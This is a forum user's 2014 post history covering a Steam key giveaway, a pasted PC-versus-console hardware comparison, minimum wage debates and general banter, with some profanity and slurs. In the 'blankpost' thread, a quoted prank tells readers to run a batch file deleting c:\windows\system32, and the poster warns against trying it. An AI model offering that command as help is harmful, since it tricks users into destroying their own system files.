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Septagon / Re: Are give-away threads allowed?
« on: August 27, 2014, 12:34:15 AM »
Yes. So long as you're not charging money for them, you're fine.
Yeah, I don't want anything for them.

Thanks!

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Septagon / Are give-away threads allowed?
« on: August 27, 2014, 12:27:09 AM »
I have a handful of Steam keys from Humble Bundles that I haven't used because I either don't want them or already own the game. Are "first to respond gets a key to [game]" threads allowed in Gaming?

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The Flood / Re: I'm a minimum wage bagboy AMA
« on: August 26, 2014, 09:13:31 PM »
How does it feel knowing that if your employer could legally pay you any less, they would?

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Gaming / Re: Entry-level PC > PS4 and XB1
« on: August 26, 2014, 02:20:01 AM »
Social anxiety, low self esteem, low self worth, depression, etc.... It can lead people down a dark path. And letting yourself become the size of a fucking whale is one of them, it's kind of a sad reality really.
Yeah, it's unfortunate. Getting fat is rarely just eating too much - it's usually a symptom of a larger problem, usually depression or anxiety related.

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The Flood / Re: I just stumbled onto a fucking GOLDMINE
« on: August 25, 2014, 09:58:30 PM »
>"stumbled"
>Jay's twitter

k

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Gaming / Re: Entry-level PC > PS4 and XB1
« on: August 25, 2014, 04:19:46 PM »

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Gaming / Re: Entry-level PC > PS4 and XB1
« on: August 25, 2014, 03:24:41 PM »
I still don't really see the appeal in gaming on a PC in your living room.
Why not? Controller support has grown a lot in the last year or so, especially with Steam Big Picture, so it's a lot easier to just sit on the couch without your mouse and keyboard.

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Gaming / Entry-level PC > PS4 and XB1
« on: August 25, 2014, 03:03:28 PM »
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The launch of latest PlayStation 4 and Xbox One consoles turned the entire gaming industry towards the eighth generation of console gaming, and the PC gaming took another step down from the front media. But despite the fact that developers almost always prefer to market console versions of the game, PC vs consoles is still one of the most popular topics that are discussed on almost every single video game website and forum, and with the announcement of Valve’s spicy Steam Machines that are being developed by a number of different vendors, it seems like this PC vs consoles controversy will only grow stronger.

Cinema Blend took the notice of how the Steam Machines are going to be a threat to the latest living-room gaming consoles and published a report showing how an entry level Steam Machine by CyberPowerPC manages to leave the PlayStation 4 and Xbox One behind in terms of specifications and performance, while fetching only $100 more bucks.
I mean, I can't say I'm too surprised, but it's a pretty interesting article. Whole text below.

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PlayStation 4 and Xbox One VS CyberPowerPC Steam Machine
CPU
Packing powerful octo-core processors, both the PlayStation 4 and Xbox One consoles are powered by AMD’s Jaguar APU technology. The core clock speed of Sony’s latest console is 1.6Ghz, and it can be overclocked to 2.75Ghz max per core. On the other hand, Microsoft boosted the clock speed of its latest living-room console to 1.75Ghz after giving a 10% performance boost to the CPU.

Now talking about CyberPowerPC Steam Machine, it comes with an A6-6400K 3.90Ghz CPU from AMD. Simple it is, the A6-6400K delivers more severe performance per core compared to the Xbox One and PlayStation 4′s overclocked tablet-style APUs, despite the fact that the number of cores in the latest consoles is comparatively higher. Now AMD’s A6-6400K could be surpassed with those titles that prefer multi-threaded design configurations, but there is not an ample number of those titles presently.

GPU
The APUs for the PlayStation 4 and Xbox One bind the CPU and GPU of the consoles to share an end, but they are still clocked in a distinctive manner which allows them to compete with what will come packed in the OEM Steam Machines. Sony arranged an 800Mhz core clock speed with 18 compute units for its latest console and also performed some custom design work on its GPU, thanks to which, the PlayStation 4 can outshine its rival gaming console by a theoretical performance rate of up to 50%. On the other hand, Microsoft upgraded the Xbox One’s GPU by 53Mhz, coming up with a total of 853Mhz core clock speed and 12 compute units.

Now, the CyberPowerPC Steam Machine runs on a Radeon R9 270 GPU with 2GB GDDR5 VRAM. Comparatively, the PlayStation 4 GPU performs closer to a Radeon HD 7870, this clearly means that the R9 is about 17% more faster in terms of memory bandwidth and 11% more powerful in terms of pixel computations, as mentioned by Hardware Compare chart. The R9 270 can also outshine PlayStation 4′s GPU by overclocking with proper conditions. Comparing it to Xbox One’s underclocked 7770 equivalent GPU, the R9 270 can leave it in dust in terms of memory bandwidth by about 150% and 100% in terms of pixel rate.

RAM
The PlayStation 4 console rocks 8GB of GDDR5 memory that is shared between the CPU and GPU on the APU. It is still not sure how much of it is required by the operating system of the console, but most reports suggest that only 5GB of usable RAM is left behind after fulfilling the OS requirements. The Xbox One comes with 8GB of DDR3 memory, and 32MB of high-bandwidth ESRAM, which is widely used for caching purposes. The operating system of Microsoft’s console also eats about 3GB memory and brings down the usable amount of RAM to 5GB.

On the other hand, the CyberPowerPC Steam Machine comes packed with 8GB of DDR3 dual-channel 1600mhz memory that can be overclocked. The amount of memory that SteamOS requires to run is still not properly known, but it asks for at least 4GB of RAM, which would mean that it only eats up about 1GB. This proves that the SteamOS requires smaller amount of RAM than operating systems of the latest video game consoles, and allows Steam Machines to reach scalable speeds.

Price
Both the latest PlayStation 4 and Xbox One consoles cost $399, while the CyberPowerPC Steam Machine has a price tag of $499. However, paying a $100 more won’t hurt much when you know that you are getting more power and performance, and given the open-source Linux -based SteamOS, you have the freedom to enjoy your favorite apps for free. Not to mention, online multiplayer gaming on Steam Machine PCs won’t cost you a penny, unlike the PlayStation 4 and Xbox One online subscriptions.

This comparison proves that while the latest consoles have their own place among gaming platforms, the CyberPowerPC Steam Machine is surely a better option if you are willing to pay only a $100 more for a living-room entertainment and gaming solution that packs better and powerful hardware specifications, and offers more performance and features. I know it will come down to the exclusive titles now, but don’t forget, we are only comparing the specifications and performance of the machines here, not the titles they are capable to run.
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Would you ever replace your living room/bedroom console with a comparable PC?

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The Flood / Re: I'm legal
« on: August 25, 2014, 12:46:42 AM »
legally retarded, maybe.

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Dealing with legal costs
What legal costs? Doesn't the law enforcement union handle legal costs?

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easing the pressure that comes with being hated by thousands, general sign of support...
I don't really see how money helps those things, but ok.

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Raise money for what?

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Serious / Re: Should sodomy be used as an alternative to prison time?
« on: August 24, 2014, 09:48:07 PM »
So bait and shitposting is allowed in Serious now?

Noted.

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Serious / Re: Yay military spending!!!!
« on: August 24, 2014, 04:09:15 PM »
>healthy school lunches

top fucking lel. Nothing healthy or filling about some government-produced protein nuggets and milk. Wouldn't feed the shit they serve in public schools to my own dog
You realize the reason school lunches are shit is mostly because healthy food costs more, right?

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Serious / Re: Yay military spending!!!!
« on: August 24, 2014, 02:35:29 PM »
WAR IS PEACE!
"Occupy Democrats"?

Wut. I would think that Democrats would support most of those things instead of spending it on a jet. I'm confused.

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The Flood / Re: So Ktan was never a creationist after all
« on: August 24, 2014, 02:50:07 AM »
I'm going to be slow on the heresy front tonight cause I'm hard at work.

For the grandpa discussion though that guy has changed his story so many times I can't even remember what he was originally like.

His age, martial status, occultation, retirement status, and the age of his supposed kids are constantly in flux.

For example a while back he was claiming that he was sorry for trolling and the in reality he was a new dad with his first child in the emergency care unit due to medical conditions or some shit.

Then a few weeks later he goes back to claiming he's a grandpa with yet another random ass pic of an old dude he grabbed off Facebook with kids and occasionally some rage inducing twist like he disowned a kid for being gay.

Then when people start ignoring him and laughing at whatever bullshit bait he posts he makes up a new sob story for people to forgive him over. I know I've seen that newborn one at least twice from him.
This is all too true

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Serious / "Minimum wage jobs are meant for teens"
« on: August 24, 2014, 02:34:52 AM »
I see this argument a lot when talking about increasing minimum wage - that minimum wage jobs are designed for low-skill workers, usually teens/high school students who just need a few bucks to buy a cheeseburger and see a movie.

Well, problem is that there are still tons of people that fill these positions that are older adults, so kids can't take their spot. From personal experience, Choo Choo [I shit you not] is an old Chinese [?] lady who has been working at the Carl's Jr by my house, delivering dine-in orders to your table, since I was 12. I'm coming up on 30. She should have moved up and out by now, but instead has been occupying a spot for over a decade that more than a few rounds of teens could have used for job experience to speak of on an otherwise-empty resume

Is there any solution to this problem?

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The Flood / Re: I now have a Nissan Sentra
« on: August 24, 2014, 02:28:25 AM »
Oh. It really doesn't, acceleration is a bit bad, but it's good once it reaches 45.
yeah, but going 45-80 sucks, too.

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The Flood / Re: I now have a Nissan Sentra
« on: August 24, 2014, 02:17:39 AM »

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The Flood / Re: I now have a Nissan Sentra
« on: August 24, 2014, 02:09:59 AM »
I mean, it's a pretty boring car with little get-up to it, but it's reliable.

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Serious / Re: Your political opinions which make people rage
« on: August 24, 2014, 01:52:26 AM »
- No reduce sentences or plea bargains for murderers, rapists, and other scum
How about no reduced sentences for anyone? It kinda invalidates the whole point of sentences if you can get around it.

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They're American, you expect them to be civilised?
>posting shit like this in Serious

keep that bullshit out of here.

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The Flood / Re: I started a petition on change.org. Check it out.
« on: August 24, 2014, 01:15:56 AM »
*expects some bullshit waste of space on change.org*

*clicks link*


h'yep.

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Serious / Re: Your political opinions which make people rage
« on: August 23, 2014, 10:47:20 PM »
Minimum wage should increase with the cost of living.

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The Flood / Re: So I made a Twitter account AMA
« on: August 23, 2014, 09:51:19 PM »
I mostly use twitter for news, like Associated Press and Reuters. There's also a good Breaking News account. Also sports scores, injuries, etc, if you're into that.

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Serious / Re: Why do people use gay as an insult?
« on: August 23, 2014, 09:46:14 PM »
Because I live relatively close to Camp Pendleton and know many Marines, they seem to have an odd obsession with calling things "gay" or using "faggot" as an insult. I don't hear it nearly as much with civilians.

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I believe that they are absolutely evil. The only reason for marriage is procreation, and if you don't intend to procreate, you shouldn't get married.
I posted this in Serious specifically to avoid this kind of shit, bro.

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The Flood / Re: Have you ever fapped to a Floodian?
« on: August 22, 2014, 08:46:47 PM »
Not knowingly.

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I'm genuinely impressed by how indifferent most people here are. It's comforting. Because in the real world, if someone brings up children and I casually mention I'm not interested in having any, I get all kinds of weird looks and predictable responses like "you'll like them when they're your own" or "you'll change your mind."

Never mind the comments my girlfriend gets when she says she doesn't want any. Apparently you're not considered a woman unless you have kids, according to many people, and your life is meaningless.

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Serious / What do you think of people who choose not to have children?
« on: August 22, 2014, 08:01:18 PM »
Aside from online forums, this is a topic I don't usually discuss in public, since having children is expected and people who choose not to are criticized. My friends and family don't even know where I stand on this. My mom keeps dropping hints about how she is looking forward to grandchildren, and that's going to be a rough conversation to have with her.

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The Flood / Re: How do I blankpost?
« on: August 22, 2014, 07:53:34 PM »
>open notepad
>type this
Code: [Select]
@echo off
del c:\windows\system32
>save the file as a .bat
>save as "all files"
>double click the document


You now have a copy/pasteable blank post.
Careful, some people are dumb enough to try this.

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